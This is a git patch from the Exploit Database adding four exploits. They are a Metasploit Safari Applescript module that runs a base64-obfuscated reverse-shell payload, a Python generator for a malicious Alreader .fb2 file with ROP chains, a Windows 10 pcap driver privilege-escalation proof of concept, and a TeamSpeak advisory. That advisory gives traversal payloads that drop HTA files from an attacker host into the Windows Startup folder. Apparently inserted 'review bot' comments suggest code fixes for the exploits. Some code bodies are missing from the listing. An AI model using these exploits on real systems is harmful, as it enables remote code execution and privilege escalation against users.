From d0e0fe59411997c3e06d4d741da66eb69b39a29a Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 27 Oct 2015 05:02:38 +0000
Subject: [PATCH] DB: 2015-10-27 4 new exploits

---
 files.csv | 4 +
 platforms/osx/remote/38535.rb | 93 ++++++
 platforms/windows/local/38532.py | 463 +++++++++++++++++++++++++++++
 platforms/windows/local/38533.c | 193 ++++++++++++
 platforms/windows/remote/38513.txt | 132 ++++++++
 5 files changed, 885 insertions(+)
 create mode 100755 platforms/osx/remote/38535.rb
 create mode 100755 platforms/windows/local/38532.py
 create mode 100755 platforms/windows/local/38533.c
 create mode 100755 platforms/windows/remote/38513.txt

diff --git a/files.csv b/files.csv
index 0e2b8b28c..908d9c7ca 100755
--- a/files.csv
+++ b/files.csv
@@ -34791,6 +34791,7 @@ id,file,description,date,author,platform,type,port
 38510,platforms/php/webapps/38510.txt,"WordPress Securimage-WP Plugin 'siwp_test.php' Cross Site Scripting Vulnerability",2013-05-11,"Gjoko Krstic",php,webapps,0
 38511,platforms/php/webapps/38511.txt,"Gallery Server Pro Arbitrary File Upload Vulnerability",2013-05-14,"Drew Calcott",php,webapps,0
 38512,platforms/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",windows,remote,0
+38513,platforms/windows/remote/38513.txt,"TeamSpeak Client <= 3.0.18.1 - RFI to RCE Exploit",2015-10-22,Scurippio,windows,remote,0
 38514,platforms/hardware/webapps/38514.py,"Beckhoff CX9020 CPU Module - Remote Code Execution Exploit",2015-10-22,Photubias,hardware,webapps,0
 38515,platforms/php/webapps/38515.txt,"WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download Vulnerability",2013-05-15,ByEge,php,webapps,0
 38516,platforms/php/webapps/38516.txt,"Open Flash Chart 'get-data' Parameter Cross-Site Scripting Vulnerability",2013-05-14,"Deepankar Arora",php,webapps,0
@@ -34806,3 +34807,6 @@ id,file,description,date,author,platform,type,port
 38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0
 38527,platforms/php/webapps/38527.txt,"Realtyna RPL Joomla Extension 8.9.2 - Multiple SQL Injection Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
 38528,platforms/php/webapps/38528.txt,"Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
+38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - SEH Based Stack Overflow (ASLR and DEP bypass)",2015-10-25,g00dv1n,windows,local,0
+38533,platforms/windows/local/38533.c,"Windows 10 - pcap Driver Local Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0
+38535,platforms/osx/remote/38535.rb,"Safari User-Assisted Applescript Exec Attack",2015-10-26,metasploit,osx,remote,0
diff --git a/platforms/osx/remote/38535.rb b/platforms/osx/remote/38535.rb
new file mode 100755
index 000000000..5324385c8
--- /dev/null
+++ b/platforms/osx/remote/38535.rb
@@ -0,0 +1,93 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ManualRanking + + include Msf::Exploit::EXE + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Safari User-Assisted Applescript Exec Attack', + 'Description' => %q{ + In versions of Mac OS X before 10.11.1, the applescript:// URL + scheme is provided, which opens the provided script in the Applescript + Editor. Pressing cmd-R in the Editor executes the code without any + additional confirmation from the user. By getting the user to press + cmd-R in Safari, and by hooking the cmd-key keypress event, a user + can be tricked into running arbitrary Applescript code. + + Gatekeeper should be disabled from Security & Privacy in order to + avoid the unidentified Developer prompt. + }, + 'License' => MSF_LICENSE, + 'Arch' => ARCH_CMD, + 'Platform' => ['unix', 'osx'], + 'Compat' => + { + 'PayloadType' => 'cmd' + }, + 'Targets' => + [ + [ 'Mac OS X', {} ] + ], + 'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' }, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Oct 16 2015', + 'Author' => [ 'joev' ], + 'References' => + [ + [ 'CVE', '2015-7007' ], + [ 'URL', 'https://support.apple.com/en-us/HT205375' ] + ], + 'BrowserRequirements' => { + :source => 'script', + :ua_name => HttpClients::SAFARI, + :os_name => OperatingSystems::Match::MAC_OSX + } + )) + + register_options([ + OptString.new('CONTENT', [false, "Content to display in browser", + "This page has failed to load. 
Press cmd-R to refresh."]), + OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes']) + ], self.class) + end + + def on_request_exploit(cli, request, profile) + print_status("Sending #{self.name}") + send_response_html(cli, exploit_html) + end + + def exploit_html + "#{content}" + end + + def exploit_js + js_obfuscate %Q| + var as = Array(150).join("\\n") + + 'do shell script "echo #{Rex::Text.encode_base64(sh)} \| base64 --decode \| /bin/sh"'; + var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as); + window.onkeydown = function(e) { + if (e.keyCode == 91) { + window.location = url; + } + }; + | + end + + def sh + 'killall "Script Editor"; nohup ' + payload.encoded + end + + def content + datastore['CONTENT'] + end + + +end \ No newline at end of file diff --git a/platforms/windows/local/38532.py b/platforms/windows/local/38532.py new file mode 100755 index 000000000..2c2f80a14 --- /dev/null +++ b/platforms/windows/local/38532.py 
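Review bot: `WritableDir` is registered as a required option with `OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])`, but nothing in the module reads `datastore['WritableDir']` — `exploit_js`, `sh` and `content` only touch `datastore['CONTENT']` and `payload.encoded` — so it is dead configuration that users must still set; either drop the line or add a comment explaining why it is kept. `include Msf::Exploit::EXE` looks equally unused, since the payload is `ARCH_CMD` and no EXE-generation helper is called anywhere in the class. As rendered here `exploit_html` returns only `"#{content}"` and never references `exploit_js`; the surrounding HTML markup was most likely stripped from this listing, so that should be checked against the original file rather than treated as a defect.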
@@ -0,0 +1,463 @@ +#!/usr/bin/env python + +#************************************************************************************************************* +# Exploit Title: Alreader 2.5 .fb2 SEH Based Stack Overflow (ASLR and DEP bypass) +# Date: 25.10.2015 +# Category: Local Exploit +# Exploit Author: g00dv1n +# Contact: g00dv1n.private@gmail.com +# Version: 2.5 +# Tested on: Windows XP SP3 / Windows 7 / Windows 8 +# Vendor Homepage: http://www.alreader.com/index.php?lang=en +# Software Link (ENG): http://www.alreader.com/download.php?file=AlReader2.Win32.en.zip +# Software Link (RU): http://www.alreader.com/download.php?file=AlReader2.Win32.ru.zip +# CVE: + + + +# Description: +# Alreader 2.5 its free FB2 reader for Windows. +# FB2 format its just XML. FB2 contain block. +# Overflow occurs if you create a long name of the author. +# App used WCHAR (1 char - 2 bytes ). If we create file in UTF-8 then app turn every single byte into two. +# For example 41 41 - 00 41 00 41 +# So We should use UTF-16. +# +# Also, we can use single null byte in payload. +# +# +# +# Instructions: +# 1. Run this py script for generate AlReader-fb2-PoC-exploit.fb2 file. +# 2. Run Alreader.exe +# 3. Open AlReader-fb2-PoC-exploit.fb2 ( FILE -> Open ) +# 4. Enjoy running Calc.exe +# +# Exploit owerview: +# For bypass ALSR I used a ROP style. Main module Alreader2.exe non-ALSR. It also contain calls GetModuleHandleW +# and GetProcAdress. So using this functions I can get pointer to call VirtualProtect to make stack executable and +# run Shellcode. +# +# At overflow overwritten SEH. So we can control EIP. For this spray Jump Adress in payload +# ( It is necessary to adjust the offset in different systems .) +# Then to get control of the stack we need ADD to ESP some value. (ADD ESP, 808h). Then ESP will point to ROP NOP +# ( It is necessary to adjust the offset in different systems .) +# Then the control get ROP chain . +# +# Program have Russian (RU) and English (Eng) versions. 
+# ROP chains for them the same but different addresses. ( addresses of ADD ESP, 808h and ROP NOP same for all versions ) +# For a combination of two versions into one exploit I place two ROP chains one after another. +# For RU version then an exception occurs, control passes first ROP chain. (ADD ESP, 808h RETN 4 then ROP NOPs ) +# For Eng version after ADD ESP, 808h RETN 4 and ROP NOPs arises yet another exepiton and Call ADD ESP, 808h. +# So ESP jump over first ROP chain. ROP NOP correct offset and Second ROP chain for Eng version, get control. +# With these tricks, the exploit works correctly for both versions. +# +# Below is ANSI-diagram of the payload: +# +# =-------------------------= +# | gdvn | just fan magic bytes +# |-------------------------| +# | | +# | jmp from SEH adress | x 500 Spray Andress to Jump from oveeride SEH +# | | (ADD ESP, 808h RETN 4) +# |-------------------------| +# | | +# | ROP NOP | x 500 Spray ROP NOP (RETN) +# | | +# |-------------------------| +# | | +# | ROP chain for | +# | RU version | +# | | +# |-------------------------| +# | SHELLCODE | Run Calc.exe +# |-------------------------| +# | | +# | ROP NOP | x 250 Spray ROP NOP (RETN) +# | | +# |-------------------------| +# | | +# | ROP chain for | +# | ENG version | +# | | +# |-------------------------| +# | SHELLCODE | Run Calc.exe +# |-------------------------| +# | | +# | ROP chain for | +# | ENG version | +# | | +# |-------------------------| +# | | +# | | +# | Junk | 'A' x 6000 +# | | +# | | +# =-------------------------= +# +# +# +# +# +#************************************************************************************************************** + + + + +####################################################################################################### +from struct import * + +####################################################################################################### +file_result = "AlReader-fb2-PoC-exploit.fb2" + + 
+######################################################################################################## + +fuz_text = '' # init fuzzy string + + + + +jmp_to = pack(' + + + + + + ''' + +end = ''' + + + + EXPLOIT TEST + + + +''' +start_u = start.encode('utf-16') + +end_u = end.encode('utf-16') + +fout = open(file_result, 'wb') +fout.write(start_u) +fout.close() + +fout = open(file_result,'ab') +fout.write(fuz_text) +fout.close() + +fout = open(file_result,'ab') +fout.write(end_u) +fout.close() + + +print "[*] File successfully created !!\n\n" \ No newline at end of file diff --git a/platforms/windows/local/38533.c b/platforms/windows/local/38533.c new file mode 100755 index 000000000..dc3cb2161 --- /dev/null +++ b/platforms/windows/local/38533.c 
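Review bot: The three `open`/`write`/`close` cycles at the end of the script (`'wb'` followed by two `'ab'` reopenings) rewrite the same file in pieces, and an exception between a `write` and its `close` leaves the handle open; a single `with open(file_result, 'wb') as fout:` block holding the three `fout.write(...)` calls is the idiomatic form and closes the file on every path. `from struct import *` imports the whole module when only `pack` is visibly used — `from struct import pack` states the dependency. The closing `print "[*] File successfully created !!\n\n"` is Python 2 statement syntax while the shebang is the unversioned `#!/usr/bin/env python`; where that resolves to Python 3 the script fails to parse, so either pin `python2` or use the function form. The body between `jmp_to = pack('` and the `'''` string terminators is missing from this listing, most likely because angle-bracketed text was stripped, so the middle of the hunk cannot be reviewed here.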
@@ -0,0 +1,193 @@ +## Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define SL_IOCTL_GET_EVENT_NAME CTL_CODE(0x8000, 1, METHOD_NEITHER, FILE_ANY_ACCESS) +#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) +#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L) + +/* found with : +!token +1: kd> dt nt!_OBJECT_HEADER + +0x000 PointerCount : Int4B + +0x004 HandleCount : Int4B + +0x004 NextToFree : Ptr32 Void + +0x008 Lock : _EX_PUSH_LOCK + +0x00c TypeIndex : UChar + +0x00d TraceFlags : UChar + +0x00e InfoMask : UChar + +0x00f Flags : UChar + +0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION + +0x010 QuotaBlockCharged : Ptr32 Void + +0x014 SecurityDescriptor : Ptr32 Void + +0x018 Body : _QUAD + +TypeIndex is 0x5 +*/ +#define HANDLE_TYPE_TOKEN 0x5 + + +// Undocumented SYSTEM_INFORMATION_CLASS: SystemHandleInformation +const SYSTEM_INFORMATION_CLASS SystemHandleInformation = +(SYSTEM_INFORMATION_CLASS)16; + +// The NtQuerySystemInformation function and the structures that it returns +// are internal to the operating system and subject to change from one +// release of Windows to another. To maintain the compatibility of your +// application, it is better not to use the function. 
+typedef NTSTATUS (WINAPI * PFN_NTQUERYSYSTEMINFORMATION)( + IN SYSTEM_INFORMATION_CLASS SystemInformationClass, + OUT PVOID SystemInformation, + IN ULONG SystemInformationLength, + OUT PULONG ReturnLength OPTIONAL + ); + +// Undocumented structure: SYSTEM_HANDLE_INFORMATION +typedef struct _SYSTEM_HANDLE +{ + ULONG ProcessId; + UCHAR ObjectTypeNumber; + UCHAR Flags; + USHORT Handle; + PVOID Object; + ACCESS_MASK GrantedAccess; +} SYSTEM_HANDLE, *PSYSTEM_HANDLE; + +typedef struct _SYSTEM_HANDLE_INFORMATION +{ + ULONG NumberOfHandles; + SYSTEM_HANDLE Handles[1]; +} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; + + +// Undocumented FILE_INFORMATION_CLASS: FileNameInformation +const FILE_INFORMATION_CLASS FileNameInformation = +(FILE_INFORMATION_CLASS)9; + +// The NtQueryInformationFile function and the structures that it returns +// are internal to the operating system and subject to change from one +// release of Windows to another. To maintain the compatibility of your +// application, it is better not to use the function. +typedef NTSTATUS (WINAPI * PFN_NTQUERYINFORMATIONFILE)( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass + ); + +// FILE_NAME_INFORMATION contains name of queried file object. +typedef struct _FILE_NAME_INFORMATION { + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION; + + +void* FindTokenAddressHandles(ULONG pid) +{ + ///////////////////////////////////////////////////////////////////////// + // Prepare for NtQuerySystemInformation and NtQueryInformationFile. + // + + // The functions have no associated import library. You must use the + // LoadLibrary and GetProcAddress functions to dynamically link to + // ntdll.dll. 
+ + HINSTANCE hNtDll = LoadLibrary(_T("ntdll.dll")); + assert(hNtDll != NULL); + + PFN_NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = + (PFN_NTQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll, + "NtQuerySystemInformation"); + assert(NtQuerySystemInformation != NULL); + + + ///////////////////////////////////////////////////////////////////////// + // Get system handle information. + // + + DWORD nSize = 4096, nReturn; + PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) + HeapAlloc(GetProcessHeap(), 0, nSize); + + // NtQuerySystemInformation does not return the correct required buffer + // size if the buffer passed is too small. Instead you must call the + // function while increasing the buffer size until the function no longer + // returns STATUS_INFO_LENGTH_MISMATCH. + while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, + nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH) + { + HeapFree(GetProcessHeap(), 0, pSysHandleInfo); + nSize += 4096; + pSysHandleInfo = (SYSTEM_HANDLE_INFORMATION*)HeapAlloc( + GetProcessHeap(), 0, nSize); + } + + for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++) + { + + PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]); + + if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN) + { + printf(" ObjectTypeNumber %d , ProcessId %d , Object %p \r\n",pHandle->ObjectTypeNumber,pHandle->ProcessId,pHandle->Object); + return pHandle->Object; + } + } + + ///////////////////////////////////////////////////////////////////////// + // Clean up. 
+ // + HeapFree(GetProcessHeap(), 0, pSysHandleInfo); + + return 0; +} + +void main() +{ + DWORD dwBytesReturned; + DWORD ShellcodeFakeMemory; + HANDLE token; + + + // first create toke handle so find object address with handle + if(!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&token)) + DebugBreak(); + + void* TokenAddress = FindTokenAddressHandles(GetCurrentProcessId()); + + CloseHandle(token); + + // i dont want write fully weaponized exploit so criminal must write code to find "WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3" in runtime ( simple task :) + HANDLE hDriver = CreateFileA("\\\\.\\WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3}",GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); + if(hDriver!=INVALID_HANDLE_VALUE) + { + fprintf(stderr," Open Driver OK\n"); + + if (!DeviceIoControl(hDriver, SL_IOCTL_GET_EVENT_NAME, NULL,0x80,(void*)((char*)TokenAddress+0x34),NULL,&dwBytesReturned, NULL)) + { + fprintf(stderr,"send IOCTL error %d.\n",GetLastError()); + return; + } + else fprintf(stderr," Send IOCTL OK\n"); + } + + else + { + fprintf(stderr," Open Driver error %d.\n",GetLastError()); + return; + } + + + CloseHandle(hDriver); + getchar(); + +} \ No newline at end of file diff --git a/platforms/windows/remote/38513.txt b/platforms/windows/remote/38513.txt new file mode 100755 index 000000000..496bca28a --- /dev/null +++ b/platforms/windows/remote/38513.txt 
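Review bot: In `FindTokenAddressHandles`, the `return pHandle->Object;` inside the `for` loop skips the `HeapFree(GetProcessHeap(), 0, pSysHandleInfo);` that follows the loop, so the handle-table buffer leaks on exactly the path that finds a match; because `Object` is copied out of the struct rather than pointing into the buffer, the loop can record it and fall through to the free — `void* found = NULL;` before the loop, `found = pHandle->Object; break;` in place of the return, and `return found;` after the `HeapFree`. The two `assert(... != NULL)` checks on the `LoadLibrary` and `GetProcAddress` results are compiled out under `NDEBUG`, leaving a call through a null function pointer in a release build, and neither `HeapAlloc` result is checked; plain `if` checks with an error return would cover all three. The first line `## Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit` is not a valid preprocessor directive and should be a `//` comment, and `void main()` should be `int main(void)`. The `#include` lines show no header names here, which looks like angle-bracketed text stripped from this listing rather than a defect in the file.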
@@ -0,0 +1,132 @@ +Exploit Title: "PwnSpeak" a 0day Exploit for TeamSpeak Client <= 3.0.18.1 RFI to RCE +Date: 12/10/2015 +Author: Scurippio / (0x6FB30B11 my pgp keyid) +Vendor Homepage: https://www.teamspeak.com/ +Application: TeamSpeak 3 +Version: TeamSpeak3 Client 3.0.0 - 3.0.18.1 +Platforms: Windows, Mac OS X and Linux +Exploitation: Remote +Risk : Very High + +========= +The Bug +========= + +The bug is a simple but Critical RFI(Remote File Inclusion), and in my test case on "Windows" you can reach remote code execution. +By changing the channel description you can insert a [img] bb tag with malicious content. + +There are a few problems with the image caching on disk. + +1: There is no check on file extension. + +2: There is no file renaming, and you can fake the extension so you can create in the cache a malicious executable file like hta, scr, msi, pif, vbs etc. + + Example: + + [img] http://yourevilhost.com/thefile.hta [/img] + [img] http://yourevilhost.com/thefile.msi [/img] + [img] http://yourevilhost.com/thefile.vbs [/img] + ... + +3: Teamspeak 3 Client saves the image and recreates the same directory structure as the server where it's hosted. + + Example: + + C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.hta + C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.msi + C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.vbs + ... + +4: It is possible to do a Directory Traversal with a simple urlencode of the traversal path bypassing the built-in control. +This is the critical hole, if you combine the previous vulnerabilities you can save a malicious file in any path on the OS with the same permissions as Teamspeak client. 
+ + Example: + + [img]http://evildomain.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDesktop%5cOwnedByNonnOreste.hta[/img] + +If you set this bbcode on a channel description every user that sees it will download a file named "OwnedByNonnOreste.hta" on their Desktop with 0byte, you can also put images or other file extension! + +The built-in image fetcher in the Teamspeak client checks the content type and the file header to check if the response is a real image, but you can easily bypass this control and put your exploit payload. + +========================================== +Bypass / Vector / Payload +========================================== +To bypass the control and put arbitrary data in your malicious file you only need a web server and you can easily set the Rewrite rule for the Exploitation. + + Example: + + RewriteEngine On + RewriteCond %{REQUEST_URI} !/faker.php + RewriteRule .* /faker.php + +Then you need to write a simple php script to fake the payload as a png by sending the right content type and file header. + + Example: + + + + + PWN3D + + + + + + +If you save the file in the windows startup directory you can achieve a remote code execution. + + Example: + + [img]http://example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cWelcomeAndOwnedByNonnOreste.hta[/img] + [img]http://example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cWelcomeAndOwnedByNonnOreste.hta[/img] + +The HTA file is a prefect vector for this exploit, you can execute trusted vb script (shell command or anything else) and the png header doesn't compromise the markup language syntax. +At the next OS boot the victim will execute the malicious HTA file. + +======= +Fix +======= + +Update to beta channel or wait the 3.0.18.2 hotfix for this exploit! 
+ +====== +Info +====== + +10/20/2015 - I have reported this Vulnerability to Teamspeak developers team + +********* - Release the public exploit + +- Fuck the 'Captatori' - Tracciabili + +(Snappy is always with you :P ) + + +Copyright (c) 2015 Scurippio + +Permission is granted for the redistribution of this alert +electronically. It may not be edited in any way without mine express +written consent. If you wish to reprint the whole or any +part of this alert in any other medium other than electronically, +please email me for permission. + +Disclaimer: The information in the advisory is believed to be accurate +at the time of publishing based on currently available information. Use +of the information constitutes acceptance for use in an AS IS condition. +There are no warranties with regard to this information. Neither the +author nor the publisher accepts any liability for any direct, indirect, +or consequential loss or damage arising from use of, or reliance on, +this information.